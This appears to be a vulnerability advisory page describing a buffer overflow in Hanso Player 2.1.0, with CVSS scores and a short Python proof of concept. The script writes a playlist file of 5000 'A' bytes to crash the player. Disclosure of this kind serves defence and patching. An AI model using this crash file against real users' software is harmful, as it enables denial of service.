Hanso Player 2.1.0 Buffer Overflow

2013-03-02 / 2014-01-12
Credit: metacom
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/python # Exploit Title:Buffer Overflow Vulnerability Hanso Player version 2.1.0 # Download link :www.hansotools.com/downloads/hanso-player-setup.exe # Author: metacom # RST # version: 2.1.0 # Category: poc # Tested on: windows 7 German f=open("fuzzzzz.m3u","w") print "Creating expoit." junk="\x41" * 5000 try: f.write(junk) f.close() print "File created" except: print "File cannot be created"

References:

http://www.hansotools.com/downloads/hanso-player-setup.exe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top